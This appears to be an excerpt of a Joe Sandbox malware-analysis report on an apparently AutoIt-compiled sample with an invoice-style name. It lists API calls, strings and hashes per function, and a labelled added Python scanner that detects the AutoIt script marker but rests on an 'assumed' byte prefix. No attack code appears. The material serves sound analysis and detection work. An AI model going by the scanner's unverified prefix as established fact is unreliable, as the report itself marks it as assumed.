                                          • GetCursorInfo.USER32(?), ref: 004750C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$Info
                                          • String ID:
                                          • API String ID: 2577412497-0
                                          • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                          • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                          • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                          • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                          APIs
                                          • _memset.LIBCMT ref: 0048A259
                                          • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                          • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                          • GetDesktopWindow.USER32 ref: 0048A40D
                                          • GetWindowRect.USER32(00000000), ref: 0048A414
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                            • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                          • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                          • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                          • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00484424
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                          • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                          • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                          • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                                          • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                                          • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                                            • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                          • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                                          • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                          • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                          • GetDriveTypeW.KERNEL32 ref: 0046A418
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 7219c61cc9b188b714514c11cc18a48e6f3d8230eed7d6a51d534ace4fdd7166
                                          • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                          • Opcode Fuzzy Hash: 7219c61cc9b188b714514c11cc18a48e6f3d8230eed7d6a51d534ace4fdd7166
                                          • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                          • GetFocus.USER32 ref: 0048C20C
                                          • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                          • _memset.LIBCMT ref: 0048C342
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                          • GetMenuItemCount.USER32(?), ref: 0048C38D
                                          • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: ff1e67c3f7e68d65cd902f598cf91c9ffe482aa318859ae485ca0e10334a8edb
                                          • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                          • Opcode Fuzzy Hash: ff1e67c3f7e68d65cd902f598cf91c9ffe482aa318859ae485ca0e10334a8edb
                                          • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0047738F
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                          • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                          • SelectObject.GDI32(00000000,?), ref: 004773B4
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                          • SelectObject.GDI32(00000006,?), ref: 00477470
                                          • DeleteObject.GDI32(?), ref: 00477479
                                          • DeleteDC.GDI32(00000006), ref: 00477480
                                          • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 7873df36c3b01a58c6129bf903e3282349e39d1e1405b60028bb58254ce1fe1e
                                          • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                          • Opcode Fuzzy Hash: 7873df36c3b01a58c6129bf903e3282349e39d1e1405b60028bb58254ce1fe1e
                                          • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                          APIs
                                            • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                            • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                            • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                            • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: 6af38cb97550c4db32f206dd7676bfc2b9136bbc5815332a324c02996c6e3436
                                          • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                          • Opcode Fuzzy Hash: 6af38cb97550c4db32f206dd7676bfc2b9136bbc5815332a324c02996c6e3436
                                          • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
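The "AU3!" and "EA06" strings referenced by the script-loader function above are the two halves of the ASCII marker ("AU3!EA06") that compiled AutoIt binaries place in front of the embedded script, which is what the "Binary is likely a compiled AutoIt script file" signature keys on. As an added example (not part of the Joe Sandbox report), a Python scanner that locates that marker in a file and reports its offset. The 16-byte binary prefix it also checks for is assumed from public AutoIt tooling and is not shown on this page; the sample bytes are constructed.

```python
"""Locate the compiled-AutoIt script marker in a binary.

Added example, not code from the Joe Sandbox report. The ASCII marker is
assembled from the "AU3!" and "EA06" strings the script-loader function
references; the 16-byte binary prefix is assumed from public AutoIt tooling.
"""
import sys

AU3_ASCII_MARKER = b"AU3!EA06"
# Assumed prefix that compiled AutoIt3 binaries place before the ASCII marker.
AU3_BINARY_PREFIX = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")


def find_au3_markers(data: bytes) -> list:
    """Return every marker hit as {"offset", "prefix_ok"}.

    prefix_ok is True when the assumed binary prefix immediately precedes
    the ASCII marker, which raises confidence that it is a real script
    header rather than a stray string in some other data.
    """
    hits = []
    start = 0
    while (off := data.find(AU3_ASCII_MARKER, start)) != -1:
        plen = len(AU3_BINARY_PREFIX)
        prefix_ok = off >= plen and data[off - plen:off] == AU3_BINARY_PREFIX
        hits.append({"offset": off, "prefix_ok": prefix_ok})
        start = off + 1
    return hits


def is_compiled_autoit(data: bytes) -> bool:
    """True for a PE (MZ header) that carries at least one marker hit."""
    return data[:2] == b"MZ" and bool(find_au3_markers(data))


# Constructed sample: fake DOS stub, padding, then prefix + marker at offset 284.
SAMPLE = (
    b"MZ" + b"\x00" * 0x3E + b"PE\x00\x00" + b"\x90" * 200
    + AU3_BINARY_PREFIX + AU3_ASCII_MARKER + b"\x01\x02"
)

if __name__ == "__main__":
    # Scan the file given on the command line, or the constructed sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for hit in find_au3_markers(blob):
        print(f"AU3!EA06 at offset 0x{hit['offset']:x} prefix_ok={hit['prefix_ok']}")
    print("compiled AutoIt:", is_compiled_autoit(blob))
```

Run it against the sample itself (`python scan_au3.py INV_NE_02_2034388.exe`) to see where the script blob sits; the marker normally lands in the resource section or the overlay, and an offset near the end of the file is a hint that the script was appended rather than compiled in as a resource.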
                                          APIs
                                          • _memset.LIBCMT ref: 00462D50
                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                          • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                          • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                          • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                          • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                          • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                          • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                          • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                          • GetCursorPos.USER32(?), ref: 00462F56
                                          • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                          • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 3993528054-0
                                          • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                          • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                          • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                          • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 004788D7
                                          • CoInitialize.OLE32(00000000), ref: 00478904
                                          • CoUninitialize.OLE32 ref: 0047890E
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                          • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                          • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                          • VariantClear.OLEAUT32(?), ref: 00478C35
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID: ,,I
                                          • API String ID: 2395222682-4163367948
                                          • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                          • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                          • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                          • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                          APIs
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • _memset.LIBCMT ref: 0045786B
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                          • Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
                                          • Opcode Fuzzy Hash: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                          • Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                          • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
